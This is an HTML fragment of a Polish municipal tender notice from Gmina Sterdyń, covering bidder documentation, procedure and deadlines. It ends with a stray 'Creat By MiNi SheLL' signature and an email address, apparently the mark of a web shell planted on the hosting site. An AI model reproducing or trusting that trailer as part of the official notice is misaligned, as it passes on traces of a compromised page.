<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty:
a) Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
W przypadku udostępnienia wiedzy i doświadczenia, zobowiązanie winno określać formę udziału w/w podmiotu w realizacji zamówienia (podwykonawstwo, konsultacje, itp.).
b) Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp, albo informacja o tym, że wykonawca nie należy do grupy kapitałowej (załącznik nr 4 do SIWZ).
2.4. Pozostałe wymagane dokumenty:
a) Formularz ofertowy - załącznik nr 1 do SIWZ.
b) Kopię wniesienia wadium.
c) Pełnomocnictwo dla osoby podpisującej ofertę, do podejmowania zobowiązań w imieniu wykonawcy (jeżeli reprezentuje go pełnomocnik) oraz pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu    i zawarcia umowy w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Nie przewiduje się zmian postanowień umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sterdyn.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sterdyń, ul. T.Kościuszki 6, 08-320 Sterdyń, pok. Nr 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2014 godzina 10:00, miejsce: Urząd Gminy Sterdyń, ul. T.Kościuszki 6, 08-320 Sterdyń, pok. Nr 16(sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com